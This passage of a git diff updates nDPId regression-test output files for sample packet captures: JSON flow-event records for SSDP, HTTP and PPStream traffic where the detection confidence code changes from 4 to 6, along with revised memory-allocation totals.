00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353136483,"flow_last_seen":1467353136483,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"183.228.182.44","dst_ip":"192.168.115.8","src_port":13913,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353189820,"flow_last_seen":1467353201861,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":665,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353189820,"flow_last_seen":1467353201861,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":665,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.61.167.104","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.61.167.104","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136836,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.61.167.82","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -542,26 +542,26 @@ 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.61.39.87","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.61.39.103","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.61.39.103","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353180830,"flow_last_seen":1467353195837,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353180830,"flow_last_seen":1467353195837,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.20","src_port":22793,"dst_port":33738,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.20","src_port":22793,"dst_port":33738,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.19","src_port":22793,"dst_port":33738,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.19","src_port":22793,"dst_port":33738,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191538,"flow_last_seen":1467353191606,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191538,"flow_last_seen":1467353191606,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196441,"flow_last_seen":1467353196535,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196740,"flow_last_seen":1467353196835,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1272,"flow_avg_l4_payload_len":636,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353197951,"flow_last_seen":1467353198052,"flow_idle_time":7580000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1470,"flow_avg_l4_payload_len":490,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353179045,"flow_last_seen":1467353203065,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196441,"flow_last_seen":1467353196535,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196740,"flow_last_seen":1467353196835,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1272,"flow_avg_l4_payload_len":636,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353197951,"flow_last_seen":1467353198052,"flow_idle_time":7580000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1470,"flow_avg_l4_payload_len":490,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353179045,"flow_last_seen":1467353203065,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.117.101.81","src_port":22793,"dst_port":10162,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.117.101.81","src_port":22793,"dst_port":10162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353197131,"flow_last_seen":1467353203157,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1161,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353197131,"flow_last_seen":1467353203157,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1161,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":400,"flow_first_seen":1467353136432,"flow_last_seen":1467353136981,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":148446,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"1.173.5.226","dst_ip":"192.168.115.8","src_port":22636,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353136439,"flow_last_seen":1467353136660,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":3271,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.198.7.89","src_port":22793,"dst_port":16039,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353136439,"flow_last_seen":1467353136660,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":3271,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.198.7.89","src_port":22793,"dst_port":16039,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353172446,"flow_last_seen":1467353172450,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":785,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1467353189784,"flow_last_seen":1467353196145,"flow_idle_time":200000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":511,"flow_tot_l4_payload_len":8571,"flow_avg_l4_payload_len":476,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353172446,"flow_last_seen":1467353172450,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":785,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1467353189784,"flow_last_seen":1467353196145,"flow_idle_time":200000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":511,"flow_tot_l4_payload_len":8571,"flow_avg_l4_payload_len":476,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.237.154.69","src_port":22793,"dst_port":4316,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.237.154.69","src_port":22793,"dst_port":4316,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","packets-captured":2557,"packets-processed":2557,"total-skipped-flows":0,"total-l4-payload-len":2121102,"total-not-detected-flows":34,"total-guessed-flows":2,"total-detected-flows":71,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":107,"total-idle-flows":107,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":567,"global_ts_msec":1467353203157} @@ -573,9 +573,9 @@ ~~ total active/idle flows...: 107/107 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6074961 bytes -~~ total memory freed........: 6074961 bytes -~~ total allocations/frees...: 121223/121223 +~~ total memory allocated....: 6208595 bytes +~~ total memory freed........: 6208595 bytes +~~ total allocations/frees...: 123985/123985 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 451 chars ~~ json string max len.......: 2182 chars diff --git a/test/results/pptp.pcap.out b/test/results/pptp.pcap.out index 28e74b55e..f91696f66 100644 --- a/test/results/pptp.pcap.out +++ b/test/results/pptp.pcap.out @@ -4,8 +4,8 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1451895531141,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531141,"pkt":"AhoR+E9+0N+aZRdHCABFAAA8SqVAAEAGB\/LAqCsWv2U9AaGWBrt+ULaEAAAAAKACchAUeAAAAgQFtAQCCAoAB\/whAAAAAAEDAwo="} 